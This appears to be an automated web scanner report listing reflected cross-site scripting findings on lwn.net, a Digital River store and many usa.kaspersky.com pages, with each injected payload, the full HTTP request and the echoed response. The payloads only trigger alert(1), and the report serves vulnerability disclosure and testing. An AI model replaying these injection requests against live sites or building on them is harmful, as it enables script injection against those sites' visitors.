GET /Articles/456878/?de815"><script>alert(1)</script>abe18a1863=1 HTTP/1.1 Host: lwn.net Proxy-Connection: keep-alive Referer: http://www.google.com/#sclient=psy&hl=en&tbm=nws&source=hp&q=%22xss.cx%22&pbx=1&oq=%22xss.cx%22&aq=f&aqi=&aql=&gs_sm=e&gs_upl=4842l5841l1l6289l8l7l0l0l0l0l221l967l2.3.2l7l0&fp=1&biw=1407&bih=931&bav=on.2,or.r_gc.r_pw.&cad=b User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head><title>Red Hat alert RHSA-2011:1220-01 (samba3x) [LWN.net]</ ...[SNIP]... <a href="/Articles/456878/?de815"><script>alert(1)</script>abe18a1863=1?format=printable" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 836fe"><script>alert(1)</script>97f2d4406c3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /favicon.ico836fe"><script>alert(1)</script>97f2d4406c3 HTTP/1.1 Accept: */* Accept-Encoding: gzip User-Agent: Mozilla/5.0 (compatible; Google Desktop/5.9.1005.12335; http://desktop.google.com/) Host: lwn.net Proxy-Connection: Keep-Alive
Response
HTTP/1.1 404 Not Found Date: Sun, 04 Sep 2011 12:14:10 GMT Server: Apache Expires: -1 Content-Length: 4295 Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head><title>404 - Not Found [LWN.net]</title> <meta HTTP- ...[SNIP]... <a href="/favicon.ico836fe"><script>alert(1)</script>97f2d4406c3?format=printable" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ba08"><script>alert(1)</script>a496f0dd586 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login7ba08"><script>alert(1)</script>a496f0dd586 HTTP/1.1 Host: lwn.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sun, 04 Sep 2011 14:01:58 GMT Server: Apache Expires: -1 Content-Length: 3762 Connection: close Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head><title>404 - Not Found [LWN.net]</title> <meta HTTP- ...[SNIP]... <a href="/login7ba08"><script>alert(1)</script>a496f0dd586?format=printable" rel="nofollow"> ...[SNIP]...
1.51. https://store.digitalriver.com/store/kasperus/en_US/buy/productID.224976400 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://store.digitalriver.com
Path:
/store/kasperus/en_US/buy/productID.224976400
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 60c77--><script>alert(1)</script>8fd004d51c5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of the domain request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a54d2"><script>alert(1)</script>6a31e0ff9e9 was submitted in the domain parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?domain=kapersky.coma54d2"><script>alert(1)</script>6a31e0ff9e9 HTTP/1.1 Host: usa.kaspersky.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht ...[SNIP]... <link rel="canonical" href="http://usa.kaspersky.com/?domain=kapersky.coma54d2"><script>alert(1)</script>6a31e0ff9e9" /> ...[SNIP]...
1.53. http://usa.kaspersky.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://usa.kaspersky.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6626"><script>alert(1)</script>ccf8d1d548d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?domain=kapersky.com&d6626"><script>alert(1)</script>ccf8d1d548d=1 HTTP/1.1 Host: usa.kaspersky.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3511f"><script>alert(1)</script>455d50a023f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 830d0"-alert(1)-"320fa374e08 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
1.56. http://usa.kaspersky.com/about-us [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://usa.kaspersky.com
Path:
/about-us
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f2d0"><script>alert(1)</script>a2fb0f73f17 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4604"><script>alert(1)</script>49eb04b0130 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dcef7"-alert(1)-"ca2b6d35942 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 43d62"-alert(1)-"396773fa193 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93f3f"><script>alert(1)</script>8c4eaed748a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht ...[SNIP]... <link rel="canonical" href="http://usa.kaspersky.com/about-us/contact-us93f3f"><script>alert(1)</script>8c4eaed748a" /> ...[SNIP]...
1.61. http://usa.kaspersky.com/about-us/contact-us [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://usa.kaspersky.com
Path:
/about-us/contact-us
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b55f0"><script>alert(1)</script>c4fbba611eb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload feb34"-alert(1)-"f6e6b16c6e2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /about-usfeb34"-alert(1)-"f6e6b16c6e2/index.html HTTP/1.1 Host: usa.kaspersky.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29a50"><script>alert(1)</script>4af2ba5c2d8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /about-us29a50"><script>alert(1)</script>4af2ba5c2d8/index.html HTTP/1.1 Host: usa.kaspersky.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cfb91"><script>alert(1)</script>26b2aedd759 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /about-us/index.htmlcfb91"><script>alert(1)</script>26b2aedd759 HTTP/1.1 Host: usa.kaspersky.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1afee"-alert(1)-"30c582827e1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /about-us/index.html1afee"-alert(1)-"30c582827e1 HTTP/1.1 Host: usa.kaspersky.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
1.66. http://usa.kaspersky.com/about-us/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://usa.kaspersky.com
Path:
/about-us/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d145"><script>alert(1)</script>2fdc71b9919 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /about-us/index.html?4d145"><script>alert(1)</script>2fdc71b9919=1 HTTP/1.1 Host: usa.kaspersky.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht ...[SNIP]... <link rel="canonical" href="http://usa.kaspersky.com/about-us/index.html?4d145"><script>alert(1)</script>2fdc71b9919=1" /> ...[SNIP]...
1.67. http://usa.kaspersky.com/about-us/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://usa.kaspersky.com
Path:
/about-us/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d6a5e"-alert(1)-"5bd0805b351 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /about-us/index.html?d6a5e"-alert(1)-"5bd0805b351=1 HTTP/1.1 Host: usa.kaspersky.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 78970"-alert(1)-"54a60fcb75b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index.html78970"-alert(1)-"54a60fcb75b HTTP/1.1 Host: usa.kaspersky.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3593"><script>alert(1)</script>31e1b81b14a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.htmlf3593"><script>alert(1)</script>31e1b81b14a HTTP/1.1 Host: usa.kaspersky.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht ...[SNIP]... <link rel="canonical" href="http://usa.kaspersky.com/index.htmlf3593"><script>alert(1)</script>31e1b81b14a" /> ...[SNIP]...
1.70. http://usa.kaspersky.com/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://usa.kaspersky.com
Path:
/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1eb7a"><script>alert(1)</script>b8beb20b2dd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.html?1eb7a"><script>alert(1)</script>b8beb20b2dd=1 HTTP/1.1 Host: usa.kaspersky.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht ...[SNIP]... <link rel="canonical" href="http://usa.kaspersky.com/index.html?1eb7a"><script>alert(1)</script>b8beb20b2dd=1" /> ...[SNIP]...
1.71. http://usa.kaspersky.com/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://usa.kaspersky.com
Path:
/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cf166"-alert(1)-"c843acf5a4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index.html?cf166"-alert(1)-"c843acf5a4=1 HTTP/1.1 Host: usa.kaspersky.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6e8ad"-alert(1)-"90934118b45 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25232"><script>alert(1)</script>11c08334a02 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4eae4"><script>alert(1)</script>52b4770be9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ee881"-alert(1)-"2890634d7c4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97cbc"><script>alert(1)</script>51d3a489a86 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eccfd"-alert(1)-"a2f812229c6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f2b6"><script>alert(1)</script>377e8706d52 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 60fc8"-alert(1)-"39c8314a1f9f02d6a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c717d"-alert(1)-"861f505fc3c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99bf4"><script>alert(1)</script>4d3ab9eb3b25b2b8b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2bbd5"><script>alert(1)</script>923210a76f3673d75 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a089"><script>alert(1)</script>3c8b24be29a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload da3f8"-alert(1)-"318c97f1b524ecda2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff38b"-alert(1)-"240ef35a4a3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 192f1"><script>alert(1)</script>390a361a01e590170 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25387"><script>alert(1)</script>fb612ec141d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht ...[SNIP]... <link rel="canonical" href="http://usa.kaspersky.com/node/12354/lightbox225387"><script>alert(1)</script>fb612ec141d" /> ...[SNIP]...
1.88. http://usa.kaspersky.com/node/12354/lightbox2 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://usa.kaspersky.com
Path:
/node/12354/lightbox2
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 995fa"><script>alert(1)</script>7517b2c51a6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the pure-pp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13f70"><script>alert(1)</script>83f6663b944a6dc68 was submitted in the pure-pp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26d2f"><script>alert(1)</script>c7577d70262 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2acfe"-alert(1)-"72f5f76d863 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ef28f"-alert(1)-"9c47b60f00f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58af2"><script>alert(1)</script>22e36934d59 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht ...[SNIP]... <link rel="canonical" href="http://usa.kaspersky.com/node/1700758af2"><script>alert(1)</script>22e36934d59" /> ...[SNIP]...
1.94. http://usa.kaspersky.com/node/17007 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://usa.kaspersky.com
Path:
/node/17007
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a3ff"><script>alert(1)</script>359df1f9655 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8802f"-alert(1)-"54076cce41c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /node8802f"-alert(1)-"54076cce41c/index.html HTTP/1.1 Host: usa.kaspersky.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab898"><script>alert(1)</script>b8234a2510c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /nodeab898"><script>alert(1)</script>b8234a2510c/index.html HTTP/1.1 Host: usa.kaspersky.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 936f7"-alert(1)-"cd3a31c3f38 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /node/index.html936f7"-alert(1)-"cd3a31c3f38 HTTP/1.1 Host: usa.kaspersky.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9fcf"><script>alert(1)</script>ee3eca5136f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
